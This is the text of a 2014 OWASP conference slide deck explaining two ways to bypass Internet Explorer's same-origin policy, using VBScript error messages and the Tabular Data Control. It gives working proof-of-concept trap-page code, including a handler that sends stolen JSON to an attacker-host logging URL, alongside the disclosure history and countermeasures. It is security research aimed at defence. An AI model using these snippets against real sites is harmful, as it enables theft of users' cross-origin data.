Bypass SOP, Theft your data

>100 Views

March 19, 14

スライド概要

OWASP AppSec APAC 2014

シェア

またはPlayer版

埋め込む »CMSなどでJSが使えない場合

関連スライド

各ページのテキスト
1.

Bypass SOP, Theft your data - XSS Allstars from Japan - Yosuke HASEGAWA

2.

About Me Yosuke HASEGAWA @hasegawayosuke Engineer of NetAgent Co.,Ltd. Secure Sky Technology Inc. technical adviser http://utf-8.jp/ author of jjencode, aaencode, ... OWASP Kansai Chapter Leader OWASP Japan Chapter Advisory Board member

3.

Agenda Cross-Origin information disclosure Not XSS, but bypass SOP Introduce 2 ways for modern IE VBScript Error msg Tabular Data Control

4.

VBScript Error message

5.

VBScript Error Msg VBScript Error Msg Target: IE9-10 (IE6-8 are safe, wow!) Reading JSON Array as VBScript on trap page created by attacker VBScript raises exception with error message including JSON content JavaScript can access to JSON content via error message

6.
[beta]
VBScript Error Msg

Reading JSON as VBScript src
fail → raises exception
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
[ "secret", "data", "is", "here" ]

// Trap page by attacker
<script
src="http://example.jp/target.json"
language="vbscript">
</script>

7.
[beta]
VBScript Error Msg

catch error msg with error handler
<script>
window.onerror = function( e ){
document.getElementById( "img" ).setAttribute(
"src", "http://attacker.utf-8.jp/log?" + e );
}
</script>
<script src="http://example.jp/target.json"
language="vbscript"></script>

GET http://attacker.utf-8.jp/log?Type%20mismatch:%20'
%20"secret",%20"message",%20"is",%20"here"%20' HTTP/1.1
Referer: http://attacker.utf-8.jp/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT
6.1; WOW64; Trident/6.0)

8.

Countermeasure Countermeasure add "X-Content-Type-Options:nosniff" HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff [ "secret", "data", "is", "here" ]

9.

VBScript Error Msg supplementary supplementary Dec 2012: reported to MS by me and @masa141421356 May 2013: Fixed with MS13-037 only for IE6-8. IE9-10 was not. "Add X-C-T-O header for IE9-11 to prevent from this attack, this is BEHAVIOR BY DESIGIN" they said.

10.

Tabular Data Control

11.
[beta]
Tabular Data Control

Tabular Data Control - TDC
ActiveX Control for binding text file into
HTML as data table
http://msdn.microsoft.com/en-us/library/ms531356.aspx

Enabled by default on IE6-IE11, with
older doc-mode

<meta http-equiv="x-ua-compatible" content="IE=10">

Spotlighted by Cure53 X-Mas Challenge
https://cure53.de/xmas2013/
https://cure53.de/xmas2013/writeup
The winner is @kinugawamasato

12.
[beta]
Tabular Data Control
//target page included secret data on example.jp/target.txt
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff
@!allow_domains=attacker.utf-8.jp
secret,data,is,here
// Trap page by attacker on attacker.utf-8.jp
function show(){
var s = document.getElementById("tdc")
.recordset.getString();
alert( s );
}
...
<meta http-equiv="x-ua-compatible" content="IE=10" >
<object id="tdc" ondatasetcomplete="show()"
classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
<param name="DataURL" value="http://example.jp/target.txt">
</object>

13.

Tabular Data Control Attacker has to insert "@!allow_domains=..." into the top of target text Once inserted, no way to prevent from theft Unhelpful: X-Content-Type-Options: nosniff Content-Disposition: attachment

14.

Countermeasure Countermeasure Restrict access to XHR request with custom X header var xhr = new XMLHttpRequest(); xhr.open( "GET", "http://example.jp/target.txt", true ); xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest"); xhr.send( null ); GET /target.json HTTP/1.1 Host: example.jp User-Agent: Mozilla/5.0… Accept: */* X-Requested-With: XMLHttpRequest and / or...

15.
[beta]
Countermeasure(cont.)

Countermeasure (cont.)
Don't allow to place text by attacker
into top of the content
//target page included secret data on example.jp/target.txt
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff
@!allow_domains=attacker.utf-8.jp
secret,data,is,here

16.

Conclusion

17.

Conclusion Conclusion IE has funny behavior even now Add X-Content-Type-Options for all resources Restrict access to XHR with custom X- header

18.

Question ? Question ? [email protected] @hasegawayosuke http://utf-8.jp/